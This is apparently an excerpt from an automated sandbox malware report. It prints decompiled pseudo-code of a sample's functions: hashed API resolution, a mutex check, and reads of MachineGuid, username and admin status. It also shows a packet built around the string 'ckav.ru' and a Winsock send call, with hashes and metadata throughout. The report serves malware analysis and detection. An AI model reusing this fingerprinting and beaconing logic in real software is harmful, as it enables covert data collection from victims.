                          				_t85 = 0x6c;
                          				_v66 = _t48;
                          				_v52 = 0;
                          				_t50 = 0x77;
                          				_v48 = _t50;
                          				_t51 = 0x73;
                          				_v46 = _t51;
                          				_t52 = 0x5f;
                          				_v42 = _t52;
                          				_v28 = 0;
                          				_t54 = 0x6f;
                          				_v24 = _t54;
                          				_t55 = 0x65;
                          				_v20 = _t55;
                          				_v64 = _t76;
                          				_v62 = _t84;
                          				_v60 = _t83;
                          				_v58 = _t78;
                          				_v56 = _t85;
                          				_v54 = _t85;
                          				_v44 = _t84;
                          				_v40 = _t76;
                          				_v38 = _t84;
                          				_v36 = _t83;
                          				_v34 = _t78;
                          				_v32 = _t85;
                          				_v30 = _t85;
                          				_v22 = _t85;
                          				_v18 = _t76;
                          				_v16 = _t84;
                          				_v14 = _t83;
                          				_v12 = _t78;
                          				_v10 = _t85;
                          				_v8 = _t85;
                          				_v6 = 0;
                          				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                          				 *_t57( &_v76);
                          				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                          				 *_t59( &_v48);
                          				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                          				_t81 =  &_v24;
                          				 *_t61( &_v24); // executed
                          				_t63 = E00414059(); // executed
                          				if(_t63 != 0) {
                          					_t65 = E00413D97(0);
                          					E004031E5(0, 0, 0xcf167df4, 0, 0);
                          					CreateMutexW(0, 1, _t65); // executed
                          					_t68 = GetLastError();
                          					_t92 = _t68 - 0xb7;
                          					if(_t68 == 0xb7) {
                          						E00413B81(0);
                          						_pop(_t81); // executed
                          					}
                          					E00413003(_t92); // executed
                          					E00412B2E(_t92); // executed
                          					E00412D31(_t81, _t84); // executed
                          					E00413B3F();
                          					E00413B81(0);
                          					 *0x49fdd0 = 1;
                          				}
                          				return 0;
                          			}

                          APIs
                          • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                          • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                          • GetLastError.KERNEL32 ref: 0041399E
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: Error$CreateLastModeMutex
                          • String ID:
                          • API String ID: 3448925889-0
                          • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                          • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                          • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                          • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
                          				long _v8;
                          				void* _t7;
                          				long _t10;
                          				void* _t21;
                          				struct _OVERLAPPED* _t24;
                          
                          				_t14 = __ebx;
                          				_t24 = 0;
                          				_v8 = 0;
                          				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
                          				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
                          				_t21 = _t7;
                          				if(_t21 != 0xffffffff) {
                          					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
                          					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
                          					if(_t10 != 0xffffffff) {
                          						E004031E5(_t14, 0, 0xc148f916, 0, 0);
                          						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
                          						_t24 =  !=  ? 1 : 0;
                          					}
                          					E00403C40(_t21);
                          				}
                          				return _t24;
                          			}









                          APIs
                          • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                          • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                          Similarity
                          • API ID: File$CreatePointerWrite
                          • String ID:
                          • API String ID: 3672724799-0
                          • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                          • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                          • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                          • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 35%
                          			E00412D31(void* __ecx, void* __edi) {
                          				long _v8;
                          				intOrPtr _v12;
                          				intOrPtr _v16;
                          				intOrPtr _v20;
                          				char _v24;
                          				char _v40;
                          				void* __ebx;
                          				intOrPtr* _t10;
                          				void* _t11;
                          				void* _t25;
                          				void* _t26;
                          				void* _t27;
                          				void* _t31;
                          				void* _t33;
                          				void* _t35;
                          				void* _t53;
                          				char* _t57;
                          				void* _t58;
                          				void* _t61;
                          				void* _t64;
                          				void* _t65;
                          				intOrPtr* _t66;
                          				void* _t67;
                          				void* _t68;
                          				void* _t69;
                          				void* _t70;
                          				void* _t71;
                          				void* _t72;
                          				void* _t73;
                          
                          				_t53 = __ecx;
                          				_t10 =  *0x49fde0;
                          				_t68 = _t67 - 0x24;
                          				 *0x49fddc = 0x927c0;
                          				 *0x49fde4 = 0;
                          				_t75 = _t10;
                          				if(_t10 != 0) {
                          					L16:
                          					_push(1);
                          					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
                          					_t61 = _t11;
                          					_t68 = _t68 + 0xc;
                          					if(_t61 != 0) {
                          						E004031E5(0, 0, 0xfcae4162, 0, 0);
                          						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
                          					}
                          					L004067C4(0xea60); // executed
                          					_pop(_t53);
                          				} else {
                          					_push(__edi);
                          					 *0x49fde0 = E004056BF(0x2bc);
                          					E00413DB7(_t53, _t75,  &_v40);
                          					_t57 =  &_v24;
                          					asm("movsd");
                          					asm("movsd");
                          					asm("movsd");
                          					asm("movsd");
                          					E004058D4( *0x49fde0, 0x12);
                          					E004058D4( *0x49fde0, 0x28);
                          					E00405872( *0x49fde0, "ckav.ru", 0, 0);
                          					_t69 = _t68 + 0x28;
                          					_t64 = E0040632F();
                          					_push(0);
                          					_push(1);
                          					if(_t64 == 0) {
                          						_push(0);
                          						_push( *0x49fde0);
                          						E00405872();
                          						_t70 = _t69 + 0x10;
                          					} else {
                          						_push(_t64);
                          						_push( *0x49fde0);
                          						E00405872();
                          						E00402BAB(_t64);
                          						_t70 = _t69 + 0x14;
                          					}
                          					_t58 = E00406130(_t57);
                          					_push(0);
                          					_push(1);
                          					_t77 = _t64;
                          					if(_t64 == 0) {
                          						_push(0);
                          						_push( *0x49fde0);
                          						_t25 = E00405872();
                          						_t71 = _t70 + 0x10; // executed
                          					} else {
                          						_push(_t58);
                          						_push( *0x49fde0);
                          						E00405872();
                          						_t25 = E00402BAB(_t58);
                          						_t71 = _t70 + 0x14;
                          					}
                          					_t26 = E004061C3(_t25, 0, _t77); // executed
                          					_t65 = _t26;
                          					_push(0);
                          					_push(1);
                          					if(_t65 == 0) {
                          						_push(0);
                          						_push( *0x49fde0);
                          						_t27 = E00405872();
                          						_t72 = _t71 + 0x10;
                          					} else {
                          						_push(_t65);
                          						_push( *0x49fde0);
                          						E00405872();
                          						_t27 = E00402BAB(_t65);
                          						_t72 = _t71 + 0x14;
                          					}
                          					_t66 = E00406189(_t27);
                          					_t79 = _t66;
                          					if(_t66 == 0) {
                          						E00405781( *0x49fde0, 0);
                          						E00405781( *0x49fde0, 0);
                          						_t73 = _t72 + 0x10; // executed
                          					} else {
                          						E00405781( *0x49fde0,  *_t66);
                          						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
                          						E00402BAB(_t66);
                          						_t73 = _t72 + 0x14;
                          					}
                          					_t31 = E004063B2(0, _t53, _t79); // executed
                          					E004058D4( *0x49fde0, _t31); // executed
                          					_t33 = E004060BD(_t79); // executed
                          					E004058D4( *0x49fde0, _t33); // executed
                          					_t35 = E0040642C(_t79); // executed
                          					E004058D4( *0x49fde0, _t35);
                          					E004058D4( *0x49fde0, _v24);
                          					E004058D4( *0x49fde0, _v20);
                          					E004058D4( *0x49fde0, _v16);
                          					E004058D4( *0x49fde0, _v12);
                          					E00405872( *0x49fde0, E00413D97(0), 1, 0);
                          					_t68 = _t73 + 0x48;
                          				}
                          				_t80 =  *0x49fde4;
                          				if( *0x49fde4 == 0) {
                          					_t10 =  *0x49fde0;
                          					goto L16;
                          				}
                          				return E00405695(_t53,  *0x49fde0);
                          			}

































                          APIs
                          • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                            • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                            • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                            • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                          Strings
                          Similarity
                          • API ID: Heap$CreateFreeProcessThread_wmemset
                          • String ID: ckav.ru
                          • API String ID: 2915393847-2696028687
                          • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                          • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                          • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                          • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0040632F() {
                          				char _v8;
                          				void* _t4;
                          				void* _t7;
                          				void* _t16;
                          
                          				_t16 = E00402B7C(0x208);
                          				if(_t16 == 0) {
                          					L4:
                          					_t4 = 0;
                          				} else {
                          					E0040338C(_t16, 0, 0x104);
                          					_t1 =  &_v8; // 0x4143e8
                          					_v8 = 0x208;
                          					_t7 = E00406069(_t16, _t1); // executed
                          					if(_t7 == 0) {
                          						E00402BAB(_t16);
                          						goto L4;
                          					} else {
                          						_t4 = _t16;
                          					}
                          				}
                          				return _t4;
                          			}








                          APIs
                            • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                            • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                          • _wmemset.LIBCMT ref: 0040634F
                            • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                          Strings
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser_wmemset
                          • String ID: CA
                          • API String ID: 2078537776-1052703068
                          • Opcode ID: 0c36caef9c7c41fd875b4d08fbd99bdca921340744b7e48925f82431a1c9c547
                          • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                          • Opcode Fuzzy Hash: 0c36caef9c7c41fd875b4d08fbd99bdca921340744b7e48925f82431a1c9c547
                          • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0041284A(void* _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, int _a20) {
                          				int _t7;
                          				void* _t8;
                          
                          				E004031E5(_t8, 2, 0xebb783d2, 0, 0);
                          				_t7 = SHRegSetPathW(_a4, _a8, _a12, _a16, _a20); // executed
                          				return _t7;
                          			}






                          APIs
                          • SHRegSetPathW.SHLWAPI(00000000,?,00000000,-80000001,00412D05,00000002,EBB783D2,00000000,00000000,5,A,00412D05,-80000001,00000000,5,A,00000000,00000000), ref: 0041286C
                          Strings
                          Similarity
                          • API ID: Path
                          • String ID: 5,A
                          • API String ID: 2875597873-3842761921
                          • Opcode ID: 985f833e562fc410bf8876cb62ef75c9432edfe987e4e1d4c2e5d722ffee7efc
                          • Instruction ID: e513a9aa1dc03f827004651369457c754081445531a40a51076ab4492d9af12d
                          • Opcode Fuzzy Hash: 985f833e562fc410bf8876cb62ef75c9432edfe987e4e1d4c2e5d722ffee7efc
                          • Instruction Fuzzy Hash: 48D0C93214020DBBDF026EC1DC02F9A3F2AAB48754F004014BB18280A1D6B3A630ABA9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
                          				int _t7;
                          				void* _t8;
                          
                          				E004031E5(_t8, 9, 0xecae3497, 0, 0);
                          				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
                          				return _t7;
                          			}






                          APIs
                          • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                          Strings
                          Similarity
                          • API ID: InformationToken
                          • String ID: IDA
                          • API String ID: 4114910276-365204570
                          • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                          • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                          • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                          • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00402C03(struct HINSTANCE__* _a4, char _a8) {
                          				_Unknown_base(*)()* _t5;
                          				void* _t6;
                          
                          				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
                          				_t1 =  &_a8; // 0x403173
                          				_t5 = GetProcAddress(_a4,  *_t1); // executed
                          				return _t5;
                          			}






                          APIs
                          • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                          Strings
                          Similarity
                          • API ID: AddressProc
                          • String ID: s1@
                          • API String ID: 190572456-427247929
                          • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                          • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                          • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                          • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 92%
                          			E00404A52(void* _a4, char* _a8, char* _a12) {
                          				void* _v8;
                          				int _v12;
                          				void* __ebx;
                          				char* _t10;
                          				long _t13;
                          				char* _t27;
                          
                          				_push(_t21);
                          				_t27 = E00402B7C(0x208);
                          				if(_t27 == 0) {
                          					L4:
                          					_t10 = 0;
                          				} else {
                          					E00402B4E(_t27, 0, 0x208);
                          					_v12 = 0x208;
                          					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
                          					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
                          					if(_t13 != 0) {
                          						E00402BAB(_t27);
                          						goto L4;
                          					} else {
                          						E004031E5(0, 9, 0xfe9f661a, 0, 0);
                          						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
                          						E00404A39(_v8); // executed
                          						_t10 = _t27;
                          					}
                          				}
                          				return _t10;
                          			}










                          APIs
                            • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                            • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                          • RegOpenKeyExA.KERNEL32(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                          • RegQueryValueExA.KERNEL32(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                          Similarity
                          • API ID: Heap$AllocateOpenProcessQueryValue
                          • String ID:
                          • API String ID: 1425999871-0
                          • Opcode ID: d1f2fb2556a871af1fc4752e03a9bf04d918b6bfb0020d432be877112e0c6869
                          • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                          • Opcode Fuzzy Hash: d1f2fb2556a871af1fc4752e03a9bf04d918b6bfb0020d432be877112e0c6869
                          • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00402B7C(long _a4) {
                          				void* _t4;
                          				void* _t7;
                          
                          				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
                          				_t7 = _t4;
                          				if(_t7 != 0) {
                          					E00402B4E(_t7, 0, _a4);
                          				}
                          				return _t7;
                          			}






                          APIs
                          • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                          • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                          Similarity
                          • API ID: Heap$AllocateProcess
                          • String ID:
                          • API String ID: 1357844191-0
                          • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                          • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                          • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                          • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 40%
                          			E004060BD(void* __eflags) {
                          				signed int _v8;
                          				char _v12;
                          				short _v16;
                          				char _v20;
                          				void* __ebx;
                          				intOrPtr* _t12;
                          				signed int _t13;
                          				intOrPtr* _t14;
                          				signed int _t15;
                          				void* _t24;
                          
                          				_v16 = 0x500;
                          				_v20 = 0;
                          				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
                          				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
                          				_v8 = _t13;
                          				if(_t13 != 0) {
                          					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
                          					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
                          					asm("sbb eax, eax");
                          					_v8 = _v8 &  ~_t15;
                          					E0040604F(_v12);
                          					return _v8;
                          				}
                          				return _t13;
                          			}














                          APIs
                          • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: CheckMembershipToken
                          • String ID:
                          • API String ID: 1351025785-0
                          • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                          • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                          • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                          • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 75%
                          			E00404056(void* __ebx, intOrPtr _a4) {
                          				intOrPtr* _t5;
                          				void* _t6;
                          				void* _t14;
                          
                          				_t14 = E00402B7C(0x208);
                          				if(_t14 == 0) {
                          					L4:
                          					return 0;
                          				}
                          				E00402B4E(_t14, 0, 0x208);
                          				_t5 = E004031E5(__ebx, 0xa, 0xc7f71852, 0, 0);
                          				_t6 =  *_t5(0, _a4, 0, 0, _t14); // executed
                          				if(_t6 != 0) {
                          					E00402BAB(_t14);
                          					goto L4;
                          				}
                          				return _t14;
                          			}







                          APIs
                            • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                            • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                          • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,0000000A,C7F71852,00000000,00000000,00413CAD,0000001A,00000001), ref: 0040408F
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateFolderPathProcess
                          • String ID:
                          • API String ID: 398210565-0
                          • Opcode ID: 21382643b5f60f7d3801c56f46f58bf1107391f6545fb4a807863915b34cde73
                          • Instruction ID: 7d0b33caadbb1370849e9dfd1ecad86b360ac2e9a1dca59c17201c727c4e1007
                          • Opcode Fuzzy Hash: 21382643b5f60f7d3801c56f46f58bf1107391f6545fb4a807863915b34cde73
                          • Instruction Fuzzy Hash: 57E06D6260156136D23129A7AC09D6B6E7DCBD3FA5B00003FF708F52C1D96D990281BA
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
                          				void* _t3;
                          				int _t5;
                          
                          				_t3 = E00403D4D(__eflags, _a4); // executed
                          				if(_t3 == 0) {
                          					__eflags = 0;
                          					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
                          					_t5 = CreateDirectoryW(_a4, 0); // executed
                          					return _t5;
                          				} else {
                          					return 1;
                          				}
                          			}






                          APIs
                          • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateDirectory
                          • String ID:
                          • API String ID: 4241100979-0
                          • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                          • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                          • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                          • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 37%
                          			E0040642C(void* __eflags) {
                          				short _v40;
                          				intOrPtr* _t6;
                          				void* _t10;
                          
                          				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
                          				 *_t6( &_v40); // executed
                          				return 0 | _v40 == 0x00000009;
                          			}







                          APIs
                          • GetNativeSystemInfo.KERNEL32(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoNativeSystem
                          • String ID:
                          • API String ID: 1721193555-0
                          • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                          • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                          • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                          • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004044A7(WCHAR* _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
                          				long _t9;
                          				void* _t10;
                          
                          				E004031E5(_t10, 0, 0xf66be5a2, 0, 0);
                          				_t9 = GetPrivateProfileStringW(_a4, _a8, _a12, _a16, _a20, _a24); // executed
                          				return _t9;
                          			}






                          APIs
                          • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?,00000000,F66BE5A2,00000000,00000000), ref: 004044CB
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: PrivateProfileString
                          • String ID:
                          • API String ID: 1096422788-0
                          • Opcode ID: 4d7b33c0f443fd34e1b412248ee3a3a873a37a73c8fd0d440c03b52d081651e8
                          • Instruction ID: e6a1e737d40be81796f932fb1ea6dd5b05bd2579ff383e5fb5a00b3a8c54de51
                          • Opcode Fuzzy Hash: 4d7b33c0f443fd34e1b412248ee3a3a873a37a73c8fd0d440c03b52d081651e8
                          • Instruction Fuzzy Hash: 52D0C27604410DBFDF025EE1DC05CAB3F6EEB48354B408425BE2895021D637DA71ABA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004049B3(void* _a4, WCHAR* _a8, WCHAR* _a12, DWORD* _a16, void* _a20, DWORD* _a24) {
                          				int _t8;
                          				void* _t9;
                          
                          				E004031E5(_t9, 2, 0xdc1011d7, 0, 0);
                          				_t8 = SHGetValueW(_a4, _a8, _a12, _a16, _a20, _a24); // executed
                          				return _t8;
                          			}






                          APIs
                          • SHGetValueW.SHLWAPI(?,?,?,?,?,?,00000002,DC1011D7,00000000,00000000), ref: 004049D8
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: Value
                          • String ID:
                          • API String ID: 3702945584-0
                          • Opcode ID: d2b5c774d03033d136a946971d24419cad296dffbc8af53813a044fec6ac893d
                          • Instruction ID: 49132b90e07f175002bb52db16c83daeb6fc20f74050e769a3614ef6a11dfcc0
                          • Opcode Fuzzy Hash: d2b5c774d03033d136a946971d24419cad296dffbc8af53813a044fec6ac893d
                          • Instruction Fuzzy Hash: 71D0923214020DBBDF026ED1DC02FAA3F2AAB09758F104014FB18280A1C677D631AB95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 37%
                          			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                          				intOrPtr _t5;
                          
                          				_t5 = _a12;
                          				if(_t5 == 0) {
                          					_t5 = E00405D0B(_a8) + 1;
                          				}
                          				__imp__#19(_a4, _a8, _t5, 0); // executed
                          				return _t5;
                          			}





                          APIs
                          • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: send
                          • String ID:
                          • API String ID: 2809346765-0
                          • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
